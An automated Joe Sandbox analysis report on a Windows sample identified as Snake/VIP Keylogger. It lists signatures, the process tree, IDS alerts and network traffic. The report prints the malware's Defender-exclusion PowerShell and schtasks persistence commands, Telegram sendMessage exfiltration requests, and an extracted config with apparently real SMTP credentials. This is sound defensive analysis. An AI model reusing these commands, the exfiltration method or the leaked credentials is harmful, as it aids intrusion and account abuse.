Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7495 P.exe

Overview

General Information

Sample name:7495 P.exe
Analysis ID:1638563
MD5:3b2219b39759e198307666db5f7c560c
SHA1:05d4aadc4563f222f807b25e6bffcf38ad6c0c48
SHA256:5713945e8a95c45d22ea948a84e37708dac21140f6434181c2c3707726dec361
Tags:exeuser-julianmckein
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 7495 P.exe (PID: 5272 cmdline: "C:\Users\user\Desktop\7495 P.exe" MD5: 3B2219B39759E198307666DB5F7C560C)
    • powershell.exe (PID: 8384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8940 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 8584 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 7495 P.exe (PID: 8812 cmdline: "C:\Users\user\Desktop\7495 P.exe" MD5: 3B2219B39759E198307666DB5F7C560C)
  • HRrXXnBIpL.exe (PID: 8888 cmdline: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe MD5: 3B2219B39759E198307666DB5F7C560C)
    • schtasks.exe (PID: 9040 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 9052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • HRrXXnBIpL.exe (PID: 9096 cmdline: "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe" MD5: 3B2219B39759E198307666DB5F7C560C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "mevlutokur@okurkardesler.com", "Password": "Mo.147258", "Host": "mail.okurkardesler.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "mevlutokur@okurkardesler.com", "Password": "Mo.147258", "Host": "mail.okurkardesler.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x112c:$a1: get_encryptedPassword
      • 0x1455:$a2: get_encryptedUsername
      • 0xf3c:$a3: get_timePasswordChanged
      • 0x1045:$a4: get_passwordField
      • 0x1142:$a5: set_encryptedPassword
      • 0x2801:$a7: get_logins
      • 0x2764:$a10: KeyLoggerEventArgs
      • 0x23c9:$a11: KeyLoggerEventArgsEventHandler
      00000012.00000002.3727156029.000000000043E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 25 entries
          SourceRuleDescriptionAuthorStrings
          18.2.HRrXXnBIpL.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.7495 P.exe.47d0650.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              2.2.7495 P.exe.47d0650.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                2.2.7495 P.exe.47d0650.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  2.2.7495 P.exe.47d0650.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2c52c:$a1: get_encryptedPassword
                  • 0x2c855:$a2: get_encryptedUsername
                  • 0x2c33c:$a3: get_timePasswordChanged
                  • 0x2c445:$a4: get_passwordField
                  • 0x2c542:$a5: set_encryptedPassword
                  • 0x2dc01:$a7: get_logins
                  • 0x2db64:$a10: KeyLoggerEventArgs
                  • 0x2d7c9:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 43 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\7495 P.exe", ParentImage: C:\Users\user\Desktop\7495 P.exe, ParentProcessId: 5272, ParentProcessName: 7495 P.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", ProcessId: 8384, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\7495 P.exe", ParentImage: C:\Users\user\Desktop\7495 P.exe, ParentProcessId: 5272, ParentProcessName: 7495 P.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", ProcessId: 8384, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe, ParentImage: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe, ParentProcessId: 8888, ParentProcessName: HRrXXnBIpL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp946B.tmp", ProcessId: 9040, ProcessName: schtasks.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 94.199.206.214, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\7495 P.exe, Initiated: true, ProcessId: 8812, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49763
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\7495 P.exe", ParentImage: C:\Users\user\Desktop\7495 P.exe, ParentProcessId: 5272, ParentProcessName: 7495 P.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", ProcessId: 8584, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\7495 P.exe", ParentImage: C:\Users\user\Desktop\7495 P.exe, ParentProcessId: 5272, ParentProcessName: 7495 P.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe", ProcessId: 8384, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\7495 P.exe", ParentImage: C:\Users\user\Desktop\7495 P.exe, ParentProcessId: 5272, ParentProcessName: 7495 P.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp", ProcessId: 8584, ProcessName: schtasks.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-14T14:43:56.695209+010020600481Malware Command and Control Activity Detected192.168.2.54976394.199.206.214587TCP
                  2025-03-14T14:46:11.332243+010020600481Malware Command and Control Activity Detected192.168.2.54976494.199.206.214587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-14T14:44:10.568385+010028033053Unknown Traffic192.168.2.549723104.21.80.1443TCP
                  2025-03-14T14:44:12.991413+010028033053Unknown Traffic192.168.2.549728104.21.80.1443TCP
                  2025-03-14T14:44:14.137604+010028033053Unknown Traffic192.168.2.549732104.21.80.1443TCP
                  2025-03-14T14:44:15.516300+010028033053Unknown Traffic192.168.2.549735104.21.80.1443TCP
                  2025-03-14T14:44:15.674271+010028033053Unknown Traffic192.168.2.549736104.21.80.1443TCP
                  2025-03-14T14:44:17.110578+010028033053Unknown Traffic192.168.2.549740104.21.80.1443TCP
                  2025-03-14T14:44:18.286260+010028033053Unknown Traffic192.168.2.549743104.21.80.1443TCP
                  2025-03-14T14:44:18.367588+010028033053Unknown Traffic192.168.2.549744104.21.80.1443TCP
                  2025-03-14T14:44:21.608477+010028033053Unknown Traffic192.168.2.549754104.21.80.1443TCP
                  2025-03-14T14:44:22.833804+010028033053Unknown Traffic192.168.2.549756104.21.80.1443TCP
                  2025-03-14T14:44:24.092729+010028033053Unknown Traffic192.168.2.549760104.21.80.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-14T14:44:08.812284+010028032742Potentially Bad Traffic192.168.2.549721193.122.130.080TCP
                  2025-03-14T14:44:10.022722+010028032742Potentially Bad Traffic192.168.2.549721193.122.130.080TCP
                  2025-03-14T14:44:11.293141+010028032742Potentially Bad Traffic192.168.2.549724193.122.130.080TCP
                  2025-03-14T14:44:12.775236+010028032742Potentially Bad Traffic192.168.2.549727193.122.130.080TCP
                  2025-03-14T14:44:13.605448+010028032742Potentially Bad Traffic192.168.2.549727193.122.130.080TCP
                  2025-03-14T14:44:14.685344+010028032742Potentially Bad Traffic192.168.2.549734193.122.130.080TCP
                  2025-03-14T14:44:16.436934+010028032742Potentially Bad Traffic192.168.2.549738193.122.130.080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-14T14:44:20.649079+010018100071Potentially Bad Traffic192.168.2.549750149.154.167.220443TCP
                  2025-03-14T14:44:25.393840+010018100071Potentially Bad Traffic192.168.2.549761149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "mevlutokur@okurkardesler.com", "Password": "Mo.147258", "Host": "mail.okurkardesler.com", "Port": "587"}
                  Source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mevlutokur@okurkardesler.com", "Password": "Mo.147258", "Host": "mail.okurkardesler.com", "Port": "587", "Version": "4.4"}
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeReversingLabs: Detection: 44%
                  Source: 7495 P.exeVirustotal: Detection: 43%Perma Link
                  Source: 7495 P.exeReversingLabs: Detection: 44%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: mevlutokur@okurkardesler.com
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: Mo.147258
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: mail.okurkardesler.com
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: garyantonio0934@gmail.com
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: 587
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor:
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: mevlutokur@okurkardesler.com
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: Mo.147258
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: mail.okurkardesler.com
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: garyantonio0934@gmail.com
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: 587
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor:
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: mevlutokur@okurkardesler.com
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: Mo.147258
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: mail.okurkardesler.com
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: garyantonio0934@gmail.com
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor: 587
                  Source: 2.2.7495 P.exe.478c830.1.raw.unpackString decryptor:

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: 7495 P.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49722 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49725 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49729 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49761 version: TLS 1.2
                  Source: 7495 P.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 0325FC19h13_2_0325F974
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 0325F45Dh13_2_0325F2C0
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 0325F45Dh13_2_0325F4AC
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F83308h13_2_06F82EF0
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F82D41h13_2_06F82A90
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F83308h13_2_06F82EEB
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8DD71h13_2_06F8DAC8
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8D919h13_2_06F8D670
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F83308h13_2_06F83236
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8D4C1h13_2_06F8D218
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8EA79h13_2_06F8E7D0
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8E621h13_2_06F8E378
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F80D0Dh13_2_06F80B30
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F816F8h13_2_06F80B30
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8E1C9h13_2_06F8DF20
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8F781h13_2_06F8F4D8
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8F329h13_2_06F8F080
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_06F80040
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8EED1h13_2_06F8EC28
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8D069h13_2_06F8CDC0
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 4x nop then jmp 06F8FBD9h13_2_06F8F930
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 0176F45Dh18_2_0176F2C0
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 0176F45Dh18_2_0176F4AC
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 0176FC19h18_2_0176F961
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DF3308h18_2_06DF2EF0
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DF2D41h18_2_06DF2A90
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h18_2_06DF0673
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFD919h18_2_06DFD670
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFEA79h18_2_06DFE7D0
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFE1C9h18_2_06DFDF20
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFF781h18_2_06DFF4D8
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFEED1h18_2_06DFEC28
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFD069h18_2_06DFCDC0
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFDD71h18_2_06DFDAC8
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFD4C1h18_2_06DFD218
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DF3308h18_2_06DF3236
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFE621h18_2_06DFE378
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DF0D0Dh18_2_06DF0B30
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DF16F8h18_2_06DF0B30
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFF329h18_2_06DFF080
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h18_2_06DF0853
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h18_2_06DF0040
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 4x nop then jmp 06DFFBD9h18_2_06DFF930

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49764 -> 94.199.206.214:587
                  Source: Network trafficSuricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49763 -> 94.199.206.214:587
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49750 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49761 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficTCP traffic: 192.168.2.5:49763 -> 94.199.206.214:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2014/03/2025%20/%2020:19:54%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2014/03/2025%20/%2019:30:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                  Source: Joe Sandbox ViewASN Name: AEROTEK-ASTR AEROTEK-ASTR
